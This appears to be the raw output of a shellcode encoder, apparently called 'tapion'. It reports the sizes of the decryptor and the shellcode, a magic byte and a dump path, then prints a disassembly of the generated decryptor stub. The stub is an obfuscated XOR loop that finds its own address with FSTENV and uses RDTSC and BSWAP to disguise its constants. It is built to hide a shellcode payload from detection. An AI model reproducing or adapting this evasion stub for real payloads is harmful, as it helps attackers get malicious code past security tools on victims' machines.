[+] The decryptor body was generated! [+] Decryptor body size = 80 bytes [+] Shellcode size = 349 bytes [+] Decryptor + Shellcode size = 429 bytes [+] Magic byte is 24 [+] Crypto steping = 2 byte(s) [+] Pass steping = 2 byte(s) [+] Shellcode dumped to D:\asm\shell.txt.tapion_bin [+] Written 434 bytes [+] Shellcode header stored to D:\asm\shell.txt.tapion_bin.h 00401054 D9EE FLDZ 00401056 D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C] 0040105A 59 POP ECX 0040105B 50 PUSH EAX 0040105C 52 PUSH EDX 0040105D 0F31 RDTSC 0040105F 50 PUSH EAX 00401060 5B POP EBX 00401061 0F31 RDTSC 00401063 2BC3 SUB EAX,EBX 00401065 66:33C0 XOR AX,AX 00401068 03C8 ADD ECX,EAX 0040106A 5A POP EDX 0040106B 58 POP EAX 0040106C C7C3 71826D2D MOV EBX,2D6D8271 00401072 0FCB BSWAP EBX 00401074 81EB D06B8271 SUB EBX,71826BD0 0040107A 8BF1 MOV ESI,ECX 0040107C C7C2 BF775B35 MOV EDX,355B77BF 00401082 81EA 13765B35 SUB EDX,355B7613 00401088 FF36 PUSH DWORD PTR DS:[ESI] 0040108A 58 POP EAX 0040108B 46 INC ESI 0040108C 46 INC ESI 0040108D 52 PUSH EDX 0040108E 03D1 ADD EDX,ECX 00401090 3102 XOR DWORD PTR DS:[EDX],EAX 00401092 5A POP EDX 00401093 803E 24 CMP BYTE PTR DS:[ESI],24 00401096 75 04 JNZ SHORT testsh.0040109C 00401098 51 PUSH ECX 00401099 87F1 XCHG ECX,ESI 0040109B 59 POP ECX 0040109C 4A DEC EDX 0040109D 4A DEC EDX 0040109E 4B DEC EBX 0040109F 4B DEC EBX 004010A0 21DB AND EBX,EBX 004010A2 ^7F E4 JG SHORT testsh.00401088